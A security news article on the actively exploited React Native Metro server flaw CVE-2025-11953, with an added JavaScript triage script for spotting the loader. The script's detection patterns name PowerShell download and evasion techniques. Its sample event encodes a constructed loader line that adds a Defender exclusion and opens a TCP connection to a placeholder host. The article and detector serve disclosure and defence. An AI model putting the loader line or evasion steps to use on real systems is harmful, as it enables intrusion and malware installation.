Key Points
- Critical vulnerability in React Native’s Metro Server exploited by hackers.
- Known as CVE-2025-11953, it allows remote code execution.
- Attacks target both Windows and Linux systems.
- Mitigation requires upgrading development tools.
Exploitation of React Native’s Vulnerability
Cyber attackers are actively leveraging a severe vulnerability found in the Metro Development Server, a core component of React Native’s development framework, to deploy sophisticated malware. This vulnerability, identified as CVE-2025-11953 and nicknamed “Metro4Shell,” was first detected by VulnCheck’s Canary honeypot network in late December 2025, with continued activity into early 2026. Despite its critical nature, it has received limited public attention.
The flaw affects the Metro Development Server included with the @react-native-community/cli npm package, a vital tool for developing React Native applications. It originates from the server’s default setting, which exposes an endpoint vulnerable to OS command injection, allowing attackers to execute arbitrary commands remotely.
Technical Details and Impact
Researchers from JFrog traced the vulnerability to user-controlled input being passed, without sanitization, to the open() function of the open npm package. The flaw lets unauthenticated remote attackers run arbitrary shell commands. On Windows, attackers gain complete control over command execution; on macOS and Linux, they can launch executables.
Although the vulnerability carries a critical CVSS score of 9.8, the Exploit Prediction Scoring System (EPSS) assigns it a low probability of exploitation, in stark contrast to the sustained attacks actually observed.
Attack Methodology and Response
VulnCheck’s analysis shows that these attacks are not exploratory but are part of a well-coordinated campaign. The attackers use a multi-stage PowerShell-based loader, initially encoded in Base64 to avoid detection, which then executes a sequence designed to bypass security measures and establish a persistent presence on the target system.
The attack sequence first adds Microsoft Defender exclusions for specific directories so that later stages escape antivirus scanning, then opens a TCP connection to retrieve further malicious payloads. The malware, a UPX-packed Rust binary, employs anti-analysis techniques that complicate static analysis.
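The loader traits described in the two paragraphs above (a Base64-encoded PowerShell command line, a Defender exclusion being added, an outbound TCP connection to fetch the next stage) are all visible in process-creation telemetry before the Rust payload ever lands. The block below is an added example, not from VulnCheck's analysis, that runs a small triage pass over such events. The event shape and the sample lines are constructed for the example; the "spawned by node" heuristic is an assumption based on Metro running under Node.js, not something the article states.

```javascript
// Added example (not from VulnCheck's write-up): triage of process-creation
// events for the loader traits the article describes. Event fields and sample
// events are constructed; the parent-process heuristic is an assumption.

// PowerShell's -EncodedCommand takes Base64 of UTF-16LE text, and any unambiguous
// prefix of the switch (-e, -ec, -enc ...) is accepted, so match those as well.
const ENCODED_SWITCH = /-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+\/=]{16,})/i;

// Each indicator is checked against the raw command line plus any decoded text.
const INDICATORS = [
  { id: 'defender-exclusion',
    re: /Add-MpPreference\b[^\n]*-Exclusion(?:Path|Process|Extension)/i },
  { id: 'tcp-download',
    re: /System\.Net\.Sockets\.TcpClient|Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b/i },
  { id: 'evasion-switches',
    re: /-Ex(?:ecutionPolicy)?\s+Bypass|-W(?:indowStyle)?\s+Hidden|-NoP(?:rofile)?\b|-NonI(?:nteractive)?\b/i },
];

// Returns the decoded UTF-16LE script when the command line carries an
// -EncodedCommand payload, otherwise null.
function decodeEncodedCommand(cmdline) {
  const m = ENCODED_SWITCH.exec(cmdline);
  if (!m) return null;
  return Buffer.from(m[1], 'base64').toString('utf16le');
}

// Returns the list of indicator ids that fire for one event.
function triageEvent(evt) {
  const findings = [];
  const cmdline = evt.cmdline || '';
  const decoded = decodeEncodedCommand(cmdline);
  if (decoded !== null) findings.push('encoded-command');
  const text = decoded === null ? cmdline : `${cmdline}\n${decoded}`;
  for (const { id, re } of INDICATORS) {
    if (re.test(text)) findings.push(id);
  }
  // Assumption: a shell spawned directly by the dev server's node process is
  // unusual enough to be worth a look on its own.
  const parentIsNode = /(^|[\\/])node(\.exe)?$/i.test(evt.parentImage || '');
  const childIsShell = /powershell|pwsh|cmd\.exe|\/bin\/sh/i.test(evt.image || '');
  if (parentIsNode && childIsShell) findings.push('spawned-by-node');
  return findings;
}

function triageEvents(events) {
  return events.map((e) => ({ pid: e.pid, findings: triageEvent(e) }));
}

// Constructed second stage, encoded here from plain text the way PowerShell
// expects it, so the sample carries no real attacker material.
const encodedStage = Buffer.from(
  'Add-MpPreference -ExclusionPath "C:\\Users\\Public"; ' +
    "$c = New-Object System.Net.Sockets.TcpClient('198.51.100.10', 443)",
  'utf16le',
).toString('base64');

// Constructed sample events: one matching the described loader, one benign.
const SAMPLE_EVENTS = [
  { pid: 4101,
    parentImage: 'C:\\Program Files\\nodejs\\node.exe',
    image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    cmdline: `powershell.exe -NoP -W Hidden -enc ${encodedStage}` },
  { pid: 4102,
    parentImage: 'C:\\Windows\\explorer.exe',
    image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    cmdline: 'powershell.exe -File C:\\Scripts\\rotate-logs.ps1' },
];

for (const r of triageEvents(SAMPLE_EVENTS)) {
  console.log(`pid ${r.pid}: ${r.findings.length ? r.findings.join(', ') : 'clean'}`);
}

module.exports = { decodeEncodedCommand, triageEvent, triageEvents, SAMPLE_EVENTS };
```

Decoding the Base64 before matching is the step that matters: the exclusion and download indicators live inside the encoded text, so a rule that only inspects the raw command line sees nothing but an opaque blob.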
Mitigation Strategies
Organizations utilizing React Native for development are urged to upgrade to @react-native-community/cli version 20.0.0 or later, as this version addresses the vulnerability. It is essential to treat development environments with the same security rigor as production systems, ensuring that Metro Development Servers are not exposed to untrusted networks and are isolated through network segmentation.
This vulnerability underscores the need for immediate action when vulnerabilities are identified, rather than waiting for official advisories or consensus. Developer tools are particularly attractive targets due to their widespread use and often lax security measures.
Conclusion
The exploitation of CVE-2025-11953 in React Native’s Metro Server exemplifies the urgent need for developers and organizations to stay ahead of threat actors by promptly implementing security patches and following best practices in network security.
